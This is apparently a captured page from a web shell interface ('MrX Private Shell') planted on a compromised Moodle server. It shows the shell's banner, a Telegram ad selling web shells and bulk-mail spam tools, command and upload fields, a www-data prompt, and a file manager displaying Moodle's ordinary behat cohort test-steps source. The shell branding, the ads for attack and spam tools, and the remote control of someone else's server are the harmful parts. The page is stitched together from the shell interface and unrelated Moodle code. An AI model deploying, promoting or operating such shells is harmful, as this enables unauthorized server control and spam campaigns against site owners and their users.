__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Cohorts steps definitions.
 *
 * @package    core_cohort
 * @category   test
 * @copyright  2013 David Monllaó
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

// NOTE: no MOODLE_INTERNAL test here, this file may be required by behat before including /config.php.

require_once(__DIR__ . '/../../../lib/behat/behat_base.php');

/**
 * Steps definitions for cohort actions.
 *
 * @package    core_cohort
 * @category   test
 * @copyright  2013 David Monllaó
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class behat_cohort extends behat_base {

    /**
     * Adds the user to the specified cohort. The user should be specified like "Firstname Lastname (user@example.com)".
     *
     * @Given /^I add "(?P<user_fullname_string>(?:[^"]|\\")*)" user to "(?P<cohort_idnumber_string>(?:[^"]|\\")*)" cohort members$/
     * @param string $user
     * @param string $cohortidnumber
     */
    public function i_add_user_to_cohort_members($user, $cohortidnumber) {

        // If we are not in the cohorts management we should move there before anything else.
        $cohortsurl = new moodle_url('/cohort/index.php');
        if (strpos($this->getSession()->getCurrentUrl(), $cohortsurl->out(false)) !== 0) {
            // With JS enabled we should expand a few tree nodes.
            $parentnodes = get_string('users', 'admin') . ' > ' .
                get_string('accounts', 'admin');

            $this->execute("behat_general::i_am_on_homepage");
            $this->execute("behat_navigation::i_navigate_to_in_site_administration",
                $parentnodes . ' > ' . get_string('cohorts', 'cohort')
            );
        }

        $this->execute('behat_reportbuilder::i_press_action_in_the_report_row',
            [get_string('assign', 'cohort'), $this->escape($cohortidnumber)]);

        $this->execute("behat_forms::i_set_the_field_to",
            array(get_string('potusers', 'cohort'), $this->escape($user))
        );

        $this->execute("behat_forms::press_button", get_string('add'));
        $this->execute("behat_forms::press_button", get_string('backtocohorts', 'cohort'));

    }
}

Filemanager

Name Type Size Permission Actions
access_visible_cohorts.feature File 7.19 KB 0777
add_cohort.feature File 7.04 KB 0777
behat_cohort.php File 2.8 KB 0777
customfields.feature File 1.9 KB 0777
delete_cohorts.feature File 2.15 KB 0777
upload_cohort_users.feature File 2.03 KB 0777
upload_cohorts.feature File 12.5 KB 0777
view_cohorts.feature File 4.67 KB 0777
Filemanager